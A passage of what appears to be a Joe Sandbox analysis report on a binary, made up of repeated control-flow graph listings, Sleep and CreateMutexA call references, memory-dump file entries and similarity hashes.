                                                                                                                                                                                                                                                                                          control_flow_graph 428 24a1ae-24a1ce 432 24a1d0-24a1dc 428->432 433 24a1fc-24a218 428->433 436 24a1f2-24a1f9 call 25d663 432->436 437 24a1de-24a1ec 432->437 434 24a246-24a265 433->434 435 24a21a-24a226 433->435 440 24a267-24a273 434->440 441 24a293-24a916 call 2580c0 434->441 438 24a23c-24a243 call 25d663 435->438 439 24a228-24a236 435->439 436->433 437->436 442 24a935 437->442 438->434 439->438 439->442 447 24a275-24a283 440->447 448 24a289-24a290 call 25d663 440->448 444 24a953-24a994 Sleep CreateMutexA 442->444 445 24a935 call 276c6a 442->445 458 24a996-24a998 444->458 459 24a9a7-24a9a8 444->459 445->444 447->442 447->448 448->441 458->459 460 24a99a-24a9a5 458->460 460->459
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0024A963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID: T2*
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-2722087641
                                                                                                                                                                                                                                                                                          • Opcode ID: d864bc92b16244ed72821172e87d033c30015ccbc74f27ce2371136162983736
                                                                                                                                                                                                                                                                                          • Instruction ID: bbdb990f06f038e77478be17d8c65f07eb514e25ba91c3ed61a2742f613087a0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d864bc92b16244ed72821172e87d033c30015ccbc74f27ce2371136162983736
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE3199317A41408FFB0CDFB8EC8976DB766EB86310F208218E408972D1C7B699A48712

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 462 24a418-24a438 466 24a466-24a482 462->466 467 24a43a-24a446 462->467 470 24a484-24a490 466->470 471 24a4b0-24a4cf 466->471 468 24a45c-24a463 call 25d663 467->468 469 24a448-24a456 467->469 468->466 469->468 472 24a93f-24a949 call 276c6a * 2 469->472 474 24a4a6-24a4ad call 25d663 470->474 475 24a492-24a4a0 470->475 476 24a4d1-24a4dd 471->476 477 24a4fd-24a916 call 2580c0 471->477 493 24a94e 472->493 494 24a949 call 276c6a 472->494 474->471 475->472 475->474 482 24a4f3-24a4fa call 25d663 476->482 483 24a4df-24a4ed 476->483 482->477 483->472 483->482 495 24a953-24a994 Sleep CreateMutexA 493->495 496 24a94e call 276c6a 493->496 494->493 498 24a996-24a998 495->498 499 24a9a7-24a9a8 495->499 496->495 498->499 500 24a99a-24a9a5 498->500 500->499
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0024A963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID: T2*
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-2722087641
                                                                                                                                                                                                                                                                                          • Opcode ID: faec70a8885251e5ad29f9eec22b91ab5c7aa02509807a0e159f4f70233134d9
                                                                                                                                                                                                                                                                                          • Instruction ID: f65ca356f4fd651617a73674fd3732c2c28695f0c9f02f15ca75cf8e1516125d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: faec70a8885251e5ad29f9eec22b91ab5c7aa02509807a0e159f4f70233134d9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40319B317B41008BEB1CDFB8ED8DB6DB766EFC1314F248218E4149B2C5DBB599A48B52

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 502 24a54d-24a56d 506 24a56f-24a57b 502->506 507 24a59b-24a5b7 502->507 510 24a591-24a598 call 25d663 506->510 511 24a57d-24a58b 506->511 508 24a5e5-24a604 507->508 509 24a5b9-24a5c5 507->509 515 24a606-24a612 508->515 516 24a632-24a916 call 2580c0 508->516 513 24a5c7-24a5d5 509->513 514 24a5db-24a5e2 call 25d663 509->514 510->507 511->510 517 24a944-24a949 call 276c6a 511->517 513->514 513->517 514->508 521 24a614-24a622 515->521 522 24a628-24a62f call 25d663 515->522 529 24a94e 517->529 530 24a949 call 276c6a 517->530 521->517 521->522 522->516 533 24a953-24a994 Sleep CreateMutexA 529->533 534 24a94e call 276c6a 529->534 530->529 536 24a996-24a998 533->536 537 24a9a7-24a9a8 533->537 534->533 536->537 538 24a99a-24a9a5 536->538 538->537
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0024A963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID: T2*
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-2722087641
                                                                                                                                                                                                                                                                                          • Opcode ID: 7afed826c71a2341642c3fa33aa2e3abea7f78cd5ddfec2ab11038144f52fced
                                                                                                                                                                                                                                                                                          • Instruction ID: e73ce4c1fd2f1b1c20c38661dc05cac62ac3266295bb91beb59961de96f4d0ea
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7afed826c71a2341642c3fa33aa2e3abea7f78cd5ddfec2ab11038144f52fced
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81319B31AA41008BEB0CDBB8EDC976DB766EFC1314F248218E4149B2C1CB7599A48712

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 540 24a682-24a6a2 544 24a6a4-24a6b0 540->544 545 24a6d0-24a6ec 540->545 546 24a6c6-24a6cd call 25d663 544->546 547 24a6b2-24a6c0 544->547 548 24a6ee-24a6fa 545->548 549 24a71a-24a739 545->549 546->545 547->546 550 24a949 547->550 552 24a710-24a717 call 25d663 548->552 553 24a6fc-24a70a 548->553 554 24a767-24a916 call 2580c0 549->554 555 24a73b-24a747 549->555 558 24a94e 550->558 559 24a949 call 276c6a 550->559 552->549 553->550 553->552 561 24a75d-24a764 call 25d663 555->561 562 24a749-24a757 555->562 565 24a953-24a994 Sleep CreateMutexA 558->565 566 24a94e call 276c6a 558->566 559->558 561->554 562->550 562->561 572 24a996-24a998 565->572 573 24a9a7-24a9a8 565->573 566->565 572->573 574 24a99a-24a9a5 572->574 574->573
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0024A963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
